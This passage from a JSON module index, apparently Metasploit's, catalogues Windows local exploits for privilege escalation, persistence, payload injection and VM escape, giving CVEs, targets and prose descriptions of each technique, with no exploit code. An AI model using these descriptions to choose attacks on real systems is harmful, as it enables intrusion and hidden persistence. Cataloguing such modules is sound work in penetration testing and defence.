"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-12 04:32:21 +0000",
"path": "/modules/exploits/windows/local/ms16_075_reflection_juicy.rb",
"is_install_path": true,
"ref_name": "windows/local/ms16_075_reflection_juicy",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms18_8120_win32k_privesc": {
"name": "Windows SetImeInfoEx Win32k NULL Pointer Dereference",
"full_name": "exploit/windows/local/ms18_8120_win32k_privesc",
"rank": 400,
"disclosure_date": "2018-05-09",
"type": "exploit",
"author": [
"unamer",
"bigric3",
"Anton Cherepanov",
"Dhiraj Mishra <dhiraj@notsosecure.com>"
],
"description": "This module exploits elevation of privilege vulnerability that exists in Windows 7 and 2008 R2\n when the Win32k component fails to properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run arbitrary code in kernel mode. An\n attacker could then install programs; view, change, or delete data; or create new\n accounts with full user rights.\n\n This module is tested against windows 7 x86, windows 7 x64 and windows server 2008 R2 standard x64.",
"references": [
"BID-104034",
"CVE-2018-8120",
"URL-https://github.com/unamer/CVE-2018-8120",
"URL-https://github.com/bigric3/cve-2018-8120",
"URL-http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html",
"URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 7 x64",
"Windows 7 x86"
],
"mod_time": "2018-10-18 14:30:20 +0000",
"path": "/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb",
"is_install_path": true,
"ref_name": "windows/local/ms18_8120_win32k_privesc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms_ndproxy": {
"name": "MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation",
"full_name": "exploit/windows/local/ms_ndproxy",
"rank": 200,
"disclosure_date": "2013-11-27",
"type": "exploit",
"author": [
"Unknown",
"ryujin",
"Shahin Ramezany",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003\n SP2 systems, exploited in the wild in November, 2013. The vulnerability exists while\n processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used\n to access an array unsafely, and the value is used to perform a call, leading to a NULL\n pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. This\n module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In order to\n work the service \"Routing and Remote Access\" must be running on the target system.",
"references": [
"CVE-2013-5065",
"MSB-MS14-002",
"OSVDB-100368",
"BID-63971",
"EDB-30014",
"URL-http://labs.portcullis.co.uk/blog/cve-2013-5065-ndproxy-array-indexing-error-unpatched-vulnerability/",
"URL-http://technet.microsoft.com/en-us/security/advisory/2914486",
"URL-http://www.secniu.com/blog/?p=53",
"URL-http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html",
"URL-http://blog.spiderlabs.com/2013/12/the-kernel-is-calling-a-zeroday-pointer-cve-2013-5065-ring-ring.html"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP SP3",
"Windows Server 2003 SP2"
],
"mod_time": "2018-03-29 12:03:33 +0000",
"path": "/modules/exploits/windows/local/ms_ndproxy.rb",
"is_install_path": true,
"ref_name": "windows/local/ms_ndproxy",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/novell_client_nicm": {
"name": "Novell Client 2 SP3 nicm.sys Local Privilege Escalation",
"full_name": "exploit/windows/local/novell_client_nicm",
"rank": 200,
"disclosure_date": "2013-05-22",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a flaw in the nicm.sys driver to execute arbitrary code in\n kernel space. The vulnerability occurs while handling ioctl requests with code\n 0x143B6B, where a user provided pointer is used as function pointer. The module\n has been tested successfully on Windows 7 SP1 with Novell Client 2 SP3.",
"references": [
"CVE-2013-3956",
"OSVDB-93718",
"URL-http://www.novell.com/support/kb/doc.php?id=7012497",
"URL-http://pastebin.com/GB4iiEwR"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 7 SP1"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/local/novell_client_nicm.rb",
"is_install_path": true,
"ref_name": "windows/local/novell_client_nicm",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/novell_client_nwfs": {
"name": "Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation",
"full_name": "exploit/windows/local/novell_client_nwfs",
"rank": 200,
"disclosure_date": "2008-06-26",
"type": "exploit",
"author": [
"Ruben Santamarta",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a flaw in the nwfs.sys driver to overwrite data in kernel\n space. The corruption occurs while handling ioctl requests with code 0x1438BB,\n where a 0x00000009 dword is written to an arbitrary address. An entry within the\n HalDispatchTable is overwritten in order to execute arbitrary code when\n NtQueryIntervalProfile is called. The module has been tested successfully on\n Windows XP SP3 with Novell Client 4.91 SP4.",
"references": [
"CVE-2008-3158",
"OSVDB-46578",
"BID-30001"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP SP3"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/windows/local/novell_client_nwfs.rb",
"is_install_path": true,
"ref_name": "windows/local/novell_client_nwfs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ntapphelpcachecontrol": {
"name": "MS15-001 Microsoft Windows NtApphelpCacheControl Improper Authorization Check",
"full_name": "exploit/windows/local/ntapphelpcachecontrol",
"rank": 300,
"disclosure_date": "2014-09-30",
"type": "exploit",
"author": [
"James Forshaw",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "On Windows, the system call NtApphelpCacheControl (the code is actually in ahcache.sys)\n allows application compatibility data to be cached for quick reuse when new processes are\n created. A normal user can query the cache but cannot add new cached entries as the\n operation is restricted to administrators. This is checked in the function\n AhcVerifyAdminContext.\n\n This function has a vulnerability where it doesn't correctly check the impersonation token\n of the caller to determine if the user is an administrator. It reads the caller's\n impersonation token using PsReferenceImpersonationToken and then does a comparison between\n the user SID in the token to LocalSystem's SID. It doesn't check the impersonation level\n of the token so it's possible to get an identify token on your thread from a local system\n process and bypass this check.\n\n This module currently only affects Windows 8 and Windows 8.1, and requires access to\n C:\\Windows\\System\\ComputerDefaults.exe (although this can be improved).",
"references": [
"MSB-MS15-001",
"CVE-2015-0002",
"OSVEB-116497",
"EDB-35661",
"URL-https://code.google.com/p/google-security-research/issues/detail?id=118"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 8 / Windows 8.1 (x86 and x64)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/ntapphelpcachecontrol.rb",
"is_install_path": true,
"ref_name": "windows/local/ntapphelpcachecontrol",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/nvidia_nvsvc": {
"name": "Nvidia (nvsvc) Display Driver Service Local Privilege Escalation",
"full_name": "exploit/windows/local/nvidia_nvsvc",
"rank": 200,
"disclosure_date": "2012-12-25",
"type": "exploit",
"author": [
"Peter Wintersmith",
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "The named pipe, \\pipe\\nsvr, has a NULL DACL allowing any authenticated user to\n interact with the service. It contains a stacked based buffer overflow as a result\n of a memmove operation. Note the slight spelling differences: the executable is 'nvvsvc.exe',\n the service name is 'nvsvc', and the named pipe is 'nsvr'.\n\n This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012.\n It has been tested on Windows 7 64-bit against nvvsvc.exe dated Dec 1 2012.",
"references": [
"CVE-2013-0109",
"OSVDB-88745",
"URL-http://nvidia.custhelp.com/app/answers/detail/a_id/3288"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/nvidia_nvsvc.rb",
"is_install_path": true,
"ref_name": "windows/local/nvidia_nvsvc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/panda_psevents": {
"name": "Panda Security PSEvents Privilege Escalation",
"full_name": "exploit/windows/local/panda_psevents",
"rank": 600,
"disclosure_date": "2016-06-27",
"type": "exploit",
"author": [
"h00die <mike@shorebreaksecurity.com>",
"Security-Assessment.com"
],
"description": "PSEvents.exe within several Panda Security products runs hourly with SYSTEM privileges.\n When run, it checks a user writable folder for certain DLL files, and if any are found\n they are automatically run.\n Vulnerable Products:\n Panda Global Protection 2016 (<=16.1.2)\n Panda Antivirus Pro 2016 (<=16.1.2)\n Panda Small Business Protection (<=16.1.2)\n Panda Internet Security 2016 (<=16.1.2)",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/local/panda_psevents.rb",
"is_install_path": true,
"ref_name": "windows/local/panda_psevents",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/payload_inject": {
"name": "Windows Manage Memory Payload Injection",
"full_name": "exploit/windows/local/payload_inject",
"rank": 600,
"disclosure_date": "2011-10-12",
"type": "exploit",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will inject a payload into memory of a process. If a payload\n isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID\n datastore option isn't specified, then it'll inject into notepad.exe instead.",
"references": [
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2018-11-02 14:57:41 +0000",
"path": "/modules/exploits/windows/local/payload_inject.rb",
"is_install_path": true,
"ref_name": "windows/local/payload_inject",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/persistence": {
"name": "Windows Persistent Registry Startup Payload Installer",
"full_name": "exploit/windows/local/persistence",
"rank": 600,
"disclosure_date": "2011-10-19",
"type": "exploit",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>",
"g0tmi1k"
],
"description": "This module will install a payload that is executed during boot.\n It will be executed either at user logon or system startup via the registry\n value in \"CurrentVersion\\Run\" (depending on privilege and selected method).",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/persistence.rb",
"is_install_path": true,
"ref_name": "windows/local/persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/persistence_service": {
"name": "Windows Persistent Service Installer",
"full_name": "exploit/windows/local/persistence_service",
"rank": 600,
"disclosure_date": "2018-10-20",
"type": "exploit",
"author": [
"Green-m <greenm.xxoo@gmail.com>"
],
"description": "This Module will generate and upload an executable to a remote host, next will make it a persistent service.\n It will create a new service which will start the payload whenever the service is running. Admin or system\n privilege is required.",
"references": [
"URL-https://github.com/rapid7/metasploit-framework/blob/master/external/source/metsvc/src/metsvc.cpp"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2018-12-17 07:00:23 +0000",
"path": "/modules/exploits/windows/local/persistence_service.rb",
"is_install_path": true,
"ref_name": "windows/local/persistence_service",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/powershell_cmd_upgrade": {
"name": "Windows Command Shell Upgrade (Powershell)",
"full_name": "exploit/windows/local/powershell_cmd_upgrade",
"rank": 600,
"disclosure_date": "1999-01-01",
"type": "exploit",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module executes Powershell to upgrade a Windows Shell session\n to a full Meterpreter session.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/powershell_cmd_upgrade.rb",
"is_install_path": true,
"ref_name": "windows/local/powershell_cmd_upgrade",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/powershell_remoting": {
"name": "Powershell Remoting Remote Command Execution",
"full_name": "exploit/windows/local/powershell_remoting",
"rank": 600,
"disclosure_date": "1999-01-01",
"type": "exploit",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module uses Powershell Remoting (TCP 47001) to inject payloads on target machines.\n If RHOSTS are specified, it will try to resolve the IPs to hostnames, otherwise\n use a HOSTFILE to supply a list of known hostnames.",
"references": [
"CVE-1999-0504",
"OSVDB-3106"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/powershell_remoting.rb",
"is_install_path": true,
"ref_name": "windows/local/powershell_remoting",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ppr_flatten_rec": {
"name": "Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation",
"full_name": "exploit/windows/local/ppr_flatten_rec",
"rank": 200,
"disclosure_date": "2013-05-15",
"type": "exploit",
"author": [
"Tavis Ormandy <taviso@cmpxchg8b.com>",
"progmboy <programmeboy@gmail.com>",
"Keebie4e",
"egypt <egypt@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"Ben Campbell <eat_meatballs@hotmail.co.uk>",
"juan vazquez <juan.vazquez@metasploit.com>",
"OJ Reeves"
],
"description": "This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage\n of uninitialized data which allows to corrupt memory. At the moment, the module has\n been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1.",
"references": [
"CVE-2013-3660",
"EDB-25912",
"OSVDB-93539",
"MSB-MS13-053",
"URL-https://seclists.org/fulldisclosure/2013/May/91"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2018-11-25 05:09:16 +0000",
"path": "/modules/exploits/windows/local/ppr_flatten_rec.rb",
"is_install_path": true,
"ref_name": "windows/local/ppr_flatten_rec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ps_persist": {
"name": "Powershell Payload Execution",
"full_name": "exploit/windows/local/ps_persist",
"rank": 600,
"disclosure_date": "2012-08-14",
"type": "exploit",
"author": [
"RageLtMan <rageltman@sempervictus>",
"Matt \"hostess\" Andreko"
],
"description": "This module generates a dynamic executable on the session host using .NET templates.\n Code is pulled from C# templates and impregnated with a payload before being\n sent to a modified PowerShell session with .NET 4 loaded. The compiler builds\n the executable (standard or Windows service) in memory and produces a binary\n which can be started/installed and downloaded for later use. After compilation the\n PoweShell session can also sign the executable if provided a path the a .pfx formatted\n certificate.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2017-09-27 07:41:06 +0000",
"path": "/modules/exploits/windows/local/ps_persist.rb",
"is_install_path": true,
"ref_name": "windows/local/ps_persist",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ps_wmi_exec": {
"name": "Authenticated WMI Exec via Powershell",
"full_name": "exploit/windows/local/ps_wmi_exec",
"rank": 600,
"disclosure_date": "2012-08-19",
"type": "exploit",
"author": [
"RageLtMan <rageltman@sempervictus>"
],
"description": "This module uses WMI execution to launch a payload instance on a remote machine.\n In order to avoid AV detection, all execution is performed in memory via psh-net\n encoded payload. Persistence option can be set to keep the payload looping while\n a handler is present to receive it. By default the module runs as the current\n process owner. The module can be configured with credentials for the remote host\n with which to launch the process.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/ps_wmi_exec.rb",
"is_install_path": true,
"ref_name": "windows/local/ps_wmi_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/pxeexploit": {
"name": "PXE Exploit Server",
"full_name": "exploit/windows/local/pxeexploit",
"rank": 600,
"disclosure_date": "2011-08-05",
"type": "exploit",
"author": [
"scriptjunkie"
],
"description": "This module provides a PXE server, running a DHCP and TFTP server.\n The default configuration loads a linux kernel and initrd into memory that\n reads the hard drive; placing the payload on the hard drive of any Windows\n partition seen.\n\n Note: the displayed IP address of a target is the address this DHCP server\n handed out, not the \"normal\" IP address the host uses.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/pxeexploit.rb",
"is_install_path": true,
"ref_name": "windows/local/pxeexploit",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/razer_zwopenprocess": {
"name": "Razer Synapse rzpnk.sys ZwOpenProcess",
"full_name": "exploit/windows/local/razer_zwopenprocess",
"rank": 300,
"disclosure_date": "2017-03-22",
"type": "exploit",
"author": [
"Spencer McIntyre"
],
"description": "A vulnerability exists in the latest version of Razer Synapse\n (v2.20.15.1104 as of the day of disclosure) which can be leveraged\n locally by a malicious application to elevate its privileges to those of\n NT_AUTHORITY\\SYSTEM. The vulnerability lies in a specific IOCTL handler\n in the rzpnk.sys driver that passes a PID specified by the user to\n ZwOpenProcess. This can be issued by an application to open a handle to\n an arbitrary process with the necessary privileges to allocate, read and\n write memory in the specified process.\n\n This exploit leverages this vulnerability to open a handle to the\n winlogon process (which runs as NT_AUTHORITY\\SYSTEM) and infect it by\n installing a hook to execute attacker controlled shellcode. This hook is\n then triggered on demand by calling user32!LockWorkStation(), resulting\n in the attacker's payload being executed with the privileges of the\n infected winlogon process. In order for the issued IOCTL to work, the\n RazerIngameEngine.exe process must not be running. This exploit will\n check if it is, and attempt to kill it as necessary.\n\n The vulnerable software can be found here:\n https://www.razerzone.com/synapse/. No Razer hardware needs to be\n connected in order to leverage this vulnerability.\n\n This exploit is not opsec-safe due to the user being logged out as part\n of the exploitation process.",
"references": [
"CVE-2017-9769",
"URL-https://warroom.securestate.com/cve-2017-9769/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x64"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/windows/local/razer_zwopenprocess.rb",
"is_install_path": true,
"ref_name": "windows/local/razer_zwopenprocess",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-service-restarts"
],
"SideEffects": [
"screen-effects"
],
"Reliability": [
"repeatable-session"
]
}
},
"exploit_windows/local/registry_persistence": {
"name": "Windows Registry Only Persistence",
"full_name": "exploit/windows/local/registry_persistence",
"rank": 600,
"disclosure_date": "2015-07-01",
"type": "exploit",
"author": [
"Donny Maasland <donny.maasland@fox-it.com>"
],
"description": "This module will install a payload that is executed during boot.\n It will be executed either at user logon or system startup via the registry\n value in \"CurrentVersion\\Run\" (depending on privilege and selected method).\n The payload will be installed completely in registry.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-03-29 18:14:56 +0000",
"path": "/modules/exploits/windows/local/registry_persistence.rb",
"is_install_path": true,
"ref_name": "windows/local/registry_persistence",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/run_as": {
"name": "Windows Run Command As User",
"full_name": "exploit/windows/local/run_as",
"rank": 600,
"disclosure_date": "1999-01-01",
"type": "exploit",
"author": [
"Kx499",
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will login with the specified username/password and execute the\n supplied command as a hidden process. Output is not returned by default.\n Unless targeting a local user either set the DOMAIN, or specify a UPN user\n format (e.g. user@domain). This uses the CreateProcessWithLogonW WinAPI function.\n\n A custom command line can be sent instead of uploading an executable.\n APPLICAITON_NAME and COMMAND_LINE are passed to lpApplicationName and lpCommandLine\n respectively. See the MSDN documentation for how these two values interact.",
"references": [
"URL-https://msdn.microsoft.com/en-us/library/windows/desktop/ms682431"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/local/run_as.rb",
"is_install_path": true,
"ref_name": "windows/local/run_as",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/s4u_persistence": {
"name": "Windows Manage User Level Persistent Payload Installer",
"full_name": "exploit/windows/local/s4u_persistence",
"rank": 600,
"disclosure_date": "2013-01-02",
"type": "exploit",
"author": [
"Thomas McCarthy \"smilingraccoon\" <smilingraccoon@gmail.com>",
"Brandon McCann \"zeknox\" <bmccann@accuvant.com>"
],
"description": "Creates a scheduled task that will run using service-for-user (S4U).\n This allows the scheduled task to run even as an unprivileged user\n that is not logged into the device. This will result in lower security\n context, allowing access to local resources only. The module\n requires 'Logon as a batch job' permissions (SeBatchLogonRight).",
"references": [
"URL-http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/",
"URL-http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/s4u_persistence.rb",
"is_install_path": true,
"ref_name": "windows/local/s4u_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/service_permissions": {
"name": "Windows Escalate Service Permissions Local Privilege Escalation",
"full_name": "exploit/windows/local/service_permissions",
"rank": 500,
"disclosure_date": "2012-10-15",
"type": "exploit",
"author": [
"scriptjunkie"
],
"description": "This module attempts to exploit existing administrative privileges to obtain\n a SYSTEM session. If directly creating a service fails, this module will inspect\n existing services to look for insecure file or configuration permissions that may\n be hijacked. It will then attempt to restart the replaced service to run the\n payload. This will result in a new session when this succeeds.",
"references": [
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/service_permissions.rb",
"is_install_path": true,
"ref_name": "windows/local/service_permissions",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/trusted_service_path": {
"name": "Windows Service Trusted Path Privilege Escalation",
"full_name": "exploit/windows/local/trusted_service_path",
"rank": 600,
"disclosure_date": "2001-10-25",
"type": "exploit",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a logic flaw due to how the lpApplicationName parameter\n is handled. When the lpApplicationName contains a space, the file name is\n ambiguous. Take this file path as example: C:\\program files\\hello.exe;\n The Windows API will try to interpret this as two possible paths:\n C:\\program.exe, and C:\\program files\\hello.exe, and then execute all of them.\n To some software developers, this is an unexpected behavior, which becomes a\n security problem if an attacker is able to place a malicious executable in one\n of these unexpected paths, sometimes escalate privileges if run as SYSTEM.\n Some software such as OpenVPN 2.1.1, OpenSSH Server 5, and others have the\n same problem.\n\n The offensive technique is also described in Writing Secure Code (2nd Edition),\n Chapter 23, in the section \"Calling Processes Security\" on page 676.",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx",
"URL-http://www.microsoft.com/learning/en/us/book.aspx?id=5957&locale=en-us"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/trusted_service_path.rb",
"is_install_path": true,
"ref_name": "windows/local/trusted_service_path",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/virtual_box_guest_additions": {
"name": "VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation",
"full_name": "exploit/windows/local/virtual_box_guest_additions",
"rank": 200,
"disclosure_date": "2014-07-15",
"type": "exploit",
"author": [
"Matt Bergin <level@korelogic.com>",
"Jay Smith <jsmith@korelogic.com>"
],
"description": "A vulnerability within the VBoxGuest driver allows an attacker to inject memory they\n control into an arbitrary location they define. This can be used by an attacker to\n overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling\n NtQueryIntervalProfile on Windows XP SP3 systems. This has been tested with VBoxGuest\n Additions up to 4.3.10r93012.",
"references": [
"CVE-2014-2477",
"URL-https://www.korelogic.com/Resources/Advisories/KL-001-2014-001.txt"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/virtual_box_guest_additions.rb",
"is_install_path": true,
"ref_name": "windows/local/virtual_box_guest_additions",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/virtual_box_opengl_escape": {
"name": "VirtualBox 3D Acceleration Virtual Machine Escape",
"full_name": "exploit/windows/local/virtual_box_opengl_escape",
"rank": 200,
"disclosure_date": "2014-03-11",
"type": "exploit",
"author": [
"Francisco Falcon",
"Florian Ledoux",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in the 3D Acceleration support for VirtualBox. The\n vulnerability exists in the remote rendering of OpenGL-based 3D graphics. By sending a\n sequence of specially crafted rendering messages, a virtual machine can exploit an out\n of bounds array access to corrupt memory and escape to the host. This module has been\n tested successfully on Windows 7 SP1 (64 bits) as Host running Virtual Box 4.3.6.",
"references": [
"CVE-2014-0983",
"BID-66133",
"URL-http://www.coresecurity.com/advisories/oracle-virtualbox-3d-acceleration-multiple-memory-corruption-vulnerabilities",
"URL-http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=oracle_virtualbox_3d_acceleration"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"VirtualBox 4.3.6 / Windows 7 SP1 / 64 bits (ASLR/DEP bypass)"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/local/virtual_box_opengl_escape.rb",
"is_install_path": true,
"ref_name": "windows/local/virtual_box_opengl_escape",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/vss_persistence": {
"name": "Persistent Payload in Windows Volume Shadow Copy",
"full_name": "exploit/windows/local/vss_persistence",
"rank": 600,
"disclosure_date": "2011-10-21",
"type": "exploit",
"author": [
"Jedediah Rodriguez <Jedi.rodriguez@gmail.com>"
],
"description": "This module will attempt to create a persistent payload in a new volume shadow copy. This is\n based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. This module has\n been tested successfully on Windows 7. In order to achieve persistence through the RUNKEY\n option, the user should need password in order to start session on the target machine.",
"references": [
"URL-http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html",
"URL-http://www.irongeek.com/i.php?page=videos/hack3rcon2/tim-tomes-and-mark-baggett-lurking-in-the-shadows"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/vss_persistence.rb",
"is_install_path": true,
"ref_name": "windows/local/vss_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/webexec": {
"name": "WebEx Local Service Permissions Exploit",
"full_name": "exploit/windows/local/webexec",
"rank": 400,
"disclosure_date": "2018-10-09",
"type": "exploit",
"author": [
"Jeff McJunkin <jeff.mcjunkin@gmail.com>"
],
"description": "This module exploits a flaw in the 'webexservice' Windows service, which runs as SYSTEM,\n can be used to run arbitrary commands locally, and can be started by limited users in\n default installations.",
"references": [
"URL-https://webexec.org",
"CVE-2018-15442"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows x86",
"Windows x64"
],
"mod_time": "2018-10-24 16:13:47 +0000",
"path": "/modules/exploits/windows/local/webexec.rb",
"is_install_path": true,
"ref_name": "windows/local/webexec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/wmi": {
